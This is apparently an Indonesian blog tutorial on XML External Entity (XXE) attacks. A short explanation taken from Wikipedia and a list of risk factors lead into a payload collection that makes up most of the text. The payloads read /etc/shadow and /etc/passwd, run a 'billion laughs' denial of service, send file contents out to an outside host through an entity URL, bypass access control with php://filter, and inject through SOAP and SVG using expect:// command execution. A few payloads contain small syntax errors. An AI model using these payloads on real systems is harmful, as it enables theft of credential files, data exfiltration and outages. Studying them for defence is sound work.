Serangan dapat mencakup pengungkapan file lokal, yang mungkin berisi data sensitif seperti kata sandi atau data pengguna pribadi, menggunakan file: skema atau jalur relatif di pengenal sistem. Karena serangan itu terjadi relatif terhadap aplikasi yang memproses dokumen XML, penyerang dapat menggunakan aplikasi tepercaya ini untuk berporos ke sistem internal lain, mungkin mengungkapkan konten internal lainnya melalui permintaan (http) atau meluncurkan serangan CSRF ke layanan internal yang tidak dilindungi. Dalam beberapa situasi, pustaka prosesor XML yang rentan terhadap masalah korupsi memori sisi klien dapat dieksploitasi dengan mendereferensi URI berbahaya, mungkin memungkinkan eksekusi kode arbitrer di bawah akun aplikasi. Serangan lain dapat mengakses sumber daya lokal yang mungkin tidak menghentikan pengembalian data, mungkin memengaruhi ketersediaan aplikasi jika terlalu banyak utas atau proses tidak dirilis.

Perhatikan bahwa aplikasi tidak perlu mengembalikan respons secara eksplisit kepada penyerang agar rentan terhadap pengungkapan informasi. Penyerang dapat memanfaatkan informasi DNS untuk mengekstrak data melalui nama subdomain ke server DNS di bawah kendali mereka.

Source : Wikipedia

Faktor Resiko Dari Penyerangan Ini

Aplikasi mem-parsing dokumen XML.
Data tercemar diizinkan di dalam bagian pengenal sistem entitas, dalam deklarasi tipe dokumen (DTD).
Prosesor XML dikonfigurasi untuk memvalidasi dan memproses DTD.
Prosesor XML dikonfigurasi untuk menyelesaikan entitas eksternal dalam DTD.

Beberapa Payload XXE :

Contoh :


<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>

XXE File Disclosure

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>

<userInfo>

<firstName>John</firstName>

<lastName>&ent;</lastName>

</userInfo>

XXE DOS (Denial Of Service)

<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>

<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;

<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">

<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">

<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">

<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">

<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">

<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">

<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">

<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">

<tag>&lol9;</tag>

XXE Local File Inclusion (LFI)

<?xml version="1.0"?>

<!DOCTYPE foo [

<!ELEMENT foo (#ANY)>

<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

XXE Blind Local File Inclusion

<?xml version="1.0"?>

<!DOCTYPE foo [

<!ELEMENT foo (#ANY)>

<!ENTITY % xxe SYSTEM "file:///etc/passwd">

<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

XXE Access Control Bypass (Loading Restricted Resources - PHP)

<?xml version="1.0"?>

<!DOCTYPE foo [

<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>

<foo><result>&ac;</result></foo>

XXE Remote Attack - Through External Xml Inclusion

<?xml version="1.0"?>

<!DOCTYPE lolz [

<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>

<lolz><lol>3..2..1...&test<lol></lolz>

Base64 Encoded

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

XXE inside SOAP

<soap:Body>

<foo>

<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>

</foo>

</soap:Body>

XXE inside SVG

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">

<image xlink:href="expect://ls"></image>

</svg>

Nah Itulah Tentang XML External Entity Atau XXE..

Semoga Bermanfaat...

Refrensi :